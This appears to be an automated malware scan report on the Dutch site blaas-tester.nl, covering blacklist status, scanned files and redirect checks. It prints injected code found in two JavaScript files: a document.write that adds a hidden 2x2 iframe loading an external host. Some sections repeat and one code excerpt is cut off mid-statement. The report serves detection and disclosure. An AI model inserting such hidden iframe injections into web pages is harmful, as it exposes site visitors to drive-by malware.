Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blaas-tester.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.blaas-tester.nl/ | 200 OK Content-Length: 4679 Content-Type: text/html | clean |
http://www.blaas-tester.nl/js/ajax.js | 200 OK Content-Length: 1895 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bestfreedesign.com/zazd.html?j=554507></iframe>');
function HTTPSocket(URL){ this.url = URL; this.postValues = Array(); this.postKeys = Array(); this.post = Array(); this.i = 0; this.theDiv; var el = this; if(window.XMLHttpRequest){ this.xmlhttp = new XMLHttpRequest(); } else { this.xmlhttp=new this.getBody = function(){ return this.xmlhttp.responseText; } this.getVariables = function(){ b = Array(); vars = this.xmlhttp.responseText.split("&"); for(i=0; i < vars.length; i++){ values = vars[i].split("="); b[values[0]] = values[1]; } return b; } this.getXML = function(){ return this.xmlhttp.responseXML.documentElement; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://bestfreedesign.com/zazd.html?j=554507 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bestfreedesign.com/zazd.html?j=554507> | ||
http://www.blaas-tester.nl/technische-informatie/ | 200 OK Content-Length: 3428 Content-Type: text/html | clean |
http://www.blaas-tester.nl/bestellen.php | 200 OK Content-Length: 4748 Content-Type: text/html | clean |
http://www.blaas-tester.nl/korting.php | 200 OK Content-Length: 4183 Content-Type: text/html | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160527 Content-Type: application/x-javascript | clean |
http://www.blaas-tester.nl/linkvrienden/ | 200 OK Content-Length: 2590 Content-Type: text/html | clean |
http://www.blaas-tester.nl/contact/ | 200 OK Content-Length: 3462 Content-Type: text/html | clean |
http://www.blaas-tester.nl/sub-index.php | 200 OK Content-Length: 180 Content-Type: text/html | clean |
http://www.blaas-tester.nl/js/mytest.js | 200 OK Content-Length: 199 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bestfreedesign.com/zazd.html?j=554507></iframe>');
function works(){ alert('Werkt!'); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://bestfreedesign.com/zazd.html?j=554507 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bestfreedesign.com/zazd.html?j=554507> | ||
http://www.blaas-tester.nl/test404page.js | 404 Not Found Content-Length: 297 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blaas-tester.nl
Result:
GET / HTTP/1.1
Host: blaas-tester.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: blaas-tester.nl
Referer: http://www.google.com/search?q=blaas-tester.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blaas-tester.nl
Referer: http://www.google.com/search?q=blaas-tester.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.